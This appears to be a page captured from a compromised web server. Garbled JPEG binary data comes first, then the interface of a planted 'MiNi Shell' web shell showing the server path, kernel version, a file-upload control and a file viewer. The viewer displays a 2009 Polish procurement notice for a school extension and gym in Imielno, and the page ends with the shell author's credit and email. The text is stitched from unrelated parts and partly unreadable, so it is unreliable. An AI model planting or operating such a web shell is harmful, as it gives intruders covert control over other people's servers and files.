JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090325/76718-N-2009.html

<p class="kh_header"><b>Imielno: Rozbudowa budynku szkoły podstawowej wraz z budową sali gimnastycznej w Samorządowej Szkole Podstawowej w Imielnie</b><br>
<b>Numer ogłoszenia: 76718 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Imielnie , ul. Cmentarna 7, 28-313 Imielno, woj. świętokrzyskie, tel. 041 3851210, faks 041 3851210.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku szkoły podstawowej wraz z budową sali gimnastycznej w Samorządowej Szkole Podstawowej w Imielnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja budowlana pn.  Rozbudowa budynku szkoły podstawowej wraz z budową sali gimnastycznej w Samorządowej Szkole Podstawowej w Imielnie

Zakres przedmiotowy inwestycji obejmuje rozbudowę istniejącego budynku szkoły o trzy sale lekcyjne, budowę sali gimnastycznej wraz z zapleczem i łącznikiem oraz zagospodarowanie terenu przy Samorządowej Szkole Podstawowej w Imielnie. 
Podstawowe parametry:
Zaplecza sali gimnastycznej :                                                                                                                                                    - powierzchnia zabudowy               - 298,908m2                                                                                                                               - powierzchnia użytkowa 	      -         339,60m2							                                - kubatura                                       - 1302,00m3                                                                                                                                                                      

Sali  gimnastycznej:                                                                                                                                                     - powierzchnia zabudowy               -1 061,34m2                                                                                                                               - powierzchnia użytkowa 	      -           995,46m2							                                - kubatura                                       - 9 286,73,00m3                                                                                                                                                                      
Rozbudowy szkoły o trzy sale lekcyjne:                                                                                                                                                    - powierzchnia zabudowy               - 134,00m2                                                                                                                               - powierzchnia użytkowa 	      -          241,35m2							                                - kubatura                                       - 1333,30m3.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-8, 45.21.42.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany wnieść wadium w kwocie 50 000,00 PLN ( słownie: pięćdziesiąt  tysięcy)
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wniesione według wyboru Wykonawcy w:
a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158 z późn. zm. ).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział Wykonawcy posiadający uprawnienia do wykonywania określonej działalności, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 PZP oraz spełniają warunki określone w art. 22 ust. l PZP, z tym, że :
1.1.Za Wykonawcę posiadającego niezbędną wiedzę i doświadczenie oraz dysponującego potencjałem technicznym i osobami zdolnymi do wykonania zamówienia uzna się takiego, który:
a)dysponuje osobami posiadającymi uprawnienia do kierowania robotami w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych , lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia .
b)posiada doświadczenie  rozumiane jako należyte wykonanie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych odpowiadających swym rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia  o kubaturze nie mniejszej niż 10 000 m3 o wartości co najmniej 5.000.000,00 PLN każda.
       ( CPV 45212200-8, 45212222-8, 45212225-9, 45212221-1,45214200-2 ). 
1.2.	Za Wykonawcę znajdującego się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia uzna się takiego, który:
a)  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - Wykonawca winien posiadać polisę ubezpieczeniową na kwotę co najmniej 1 000 000,00 złotych,
b) posiada    środki   finansowe   lub   zdolność   kredytową    na   kwotę  nie mniejszą niż 30 % ceny oferowanej w przedkładanej ofercie.
2.	Zamawiający oceni spełnienie warunków wg kryteriów spełnia lub nie spełnia.
VII.	Udział w postępowaniu Wykonawców występujących wspólnie
1.   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2.  Żaden z Wykonawców występujących wspólnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 PZP.
3.W przypadku Wykonawców występujących wspólnie Wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia publicznego.
1.Pełnomocnictwo winno być udzielone na piśmie w jednym dokumencie i ma zawierać:
a)	wskazanie, iż udzielane jest na potrzeby zamówienia związanego z niniejszą SIWZ ,
b)oznaczenie mocodawców,
c)oznaczenie pełnomocnika,
d)zakres pełnomocnictwa,
e)czas na jaki jest udzielone,
f)podpisy osób upoważnionych do składania oświadczeń woli w imieniu mocodawców.
5.	Wszelka korespondencja , oświadczenia, wnioski adresowane będą do Pełnomocnika ze skutkiem wobec wszystkich Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca zobowiązany jest złożyć:
1.1. Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 2 do SIWZ wraz z zaparafowanym na każdej stronie projektem umowy o roboty budowlane - załącznik nr 4 do SIWZ,
     Wymagana forma dokumentu - oryginał
1.2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP wg  wzoru określonego w załączniku nr 3do SIWZ,
Wymagana forma dokumentu - oryginał
1.3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
          Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przz Wykonawcę.
1.4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
1.5.Aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające          odpowiednio, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia      
         że uzyskał przewidziane prawem zwolnienie odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawionych nie  wcześniej niż 3 miesiące przed upływem terminu          składania ofert.
       Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
1.6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. l pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
1.7.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1  pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

1.8.	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia zgodnie z pkt. VI ppkt. 1.1. lit. a SIWZ wraz załączeniem dokumentów potwierdzających posiadane uprawnienia i aktualnymi zaświadczeniami o przynależności do właściwych izb samorządu zawodowego oraz ze wskazaniem zakresu wykonywanych przez nich czynności.
Wymagana forma dokumentów:
wykaz osób i wskazanie zakresu wykonywanych czynności ( w tym: kierownika budowy, kierowników robót) - oryginał
uprawnienia - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
zaświadczenie o przynależności do właściwej izby samorządu zawodowego - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
1.9.	Wykaz robót budowlanych wykonanych w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających   wymogom wskazanym w pkt VI ppkt. 1.1. lit. b SIWZ ze wskazaniem daty,  miejsca ich wykonywania , wartości  wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie 
          Wymagana forma dokumentów:
wykaz wykonanych robót budowlanych - oryginał
dokumenty potwierdzające, że roboty budowlane zostały wykonane należycie -oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
1.10.	Polisa a w przypadku jej braku inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 1 000 000,00 złotych.
              Wymagana forma dokumentów - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
1.11.	Informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej w których Wykonawca posiada rachunek potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż 30 % ceny oferowanej w przedkładanej ofercie wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert.
             Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

2.	Dowód wniesienia wadium - zgodnie z wymogami wskazanymi w pkt. X SIWZ.
            Wymagana forma dokumentu -   W przypadku wadium wniesionego w pieniądzu -oryginał lub kopia potwierdzenia wykonania przelewu poświadczona za zgodność z oryginałem przez  Wykonawcę.   Dla pozostałych form  wadium, dowodem wniesienia jest oryginał wadium załączony do składanej oferty.

3.	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo   reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie - w przypadku:
3.1	wspólnego ubiegania się o udzielenie niniejszego zamówienia zgodnie z wymogami wskazanymi w pkt VII SIWZ,
Wymagana forma dokumentu - oryginał.
3.2	gdy z przedłożonych w ofercie dokumentów nie wynika upoważnienie do składania oświadczeń woli 
w imieniu Wykonawcy.
Wymagana forma dokumentu - oryginał.

4.	W przypadku Wykonawców występujących wspólnie dokumenty wymagane w postępowaniu składa ich pełnomocnik. W odniesieniu do każdego z Wykonawców muszą być złożone odrębne dokumenty wskazane w pkt 1.2, 1.3, 1.4, 1.5, 1.6 oraz 1.7; pozostałe dokumenty mogą być złożone łącznie.
5.	Dokumenty wymagane od Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
5.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1.3, 1.4, 1.5 oraz 1.7 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczaniem podatków opłat składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie .
5.2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1.6 składa :
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt.4-8 ustawy.
5.3.	Dokument, o którym mowa w ppkt 5.1 lit. a i c oraz ppkt.5.2 winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w ppkt 5. 1 lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w ppkt 5.1 i ppkt 5.2 zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.imielno.akcessnet.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Imielnie
ul. Cmentarna 7
28-313 Imielno
pok. nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: Urząd Gminy w Imielnie
ul. Cmentarna 7
28-313 Imielno
pok. nr 16 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com